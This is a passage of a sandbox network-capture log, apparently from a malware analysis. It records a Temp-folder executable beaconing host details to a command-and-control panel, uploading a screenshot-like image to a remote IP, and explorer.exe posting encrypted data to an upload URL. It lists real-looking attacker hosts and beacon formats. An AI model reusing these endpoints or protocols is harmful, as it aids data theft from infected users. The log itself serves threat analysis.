77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:11.485460997 CEST	17605	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
124	192.168.2.3	49850	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:11.514065027 CEST	17606	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32 Host: 185.215.113.206 Content-Length: 93811 Cache-Control: no-cache
Aug 23, 2021 02:09:11.514339924 CEST	17606	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 34 66 65 64 64 35 33 66 32 61 65 65 65 30 39 61 61 34 64 62 63 65 36 62 36 65 39 65 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------144fedd53f2aeee09aa4dbce6b6e9e32Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:09:11.526988029 CEST	17616	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:11.527087927 CEST	17619	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:11.587515116 CEST	17622	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:11.587680101 CEST	17624	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:09:11.587799072 CEST	17627	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:09:11.588085890 CEST	17630	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:09:11.588573933 CEST	17638	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:11.588876009 CEST	17639	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:11.588932991 CEST	17642	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:11.821969032 CEST	17705	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
125	192.168.2.3	49851	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:11.635440111 CEST	17645	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:11.661436081 CEST	17698	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:11.661459923 CEST	17698	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
126	192.168.2.3	49853	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:11.801903963 CEST	17704	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:11.827905893 CEST	17706	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:11.827928066 CEST	17706	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
127	192.168.2.3	49852	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:12.004295111 CEST	17707	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 170 Host: atvcampingtrips.com
Aug 23, 2021 02:09:12.004331112 CEST	17707	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 60 0d de e8 Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vu`DxclwqaGE5 TwFxP!nI%]13GYG\|Q1_-(
Aug 23, 2021 02:09:13.238387108 CEST	17909	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:09:12 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 55 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 39 08 a5 6c 58 b5 ad 1e bd cf b0 f9 6d 92 21 c7 ed 2e 15 11 83 89 9c 81 77 c1 38 1c 1f 9a 4c 8f 41 63 Data Ascii: #\(R9lXm!.w8LAc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
128	192.168.2.3	49854	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:12.022855997 CEST	17708	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
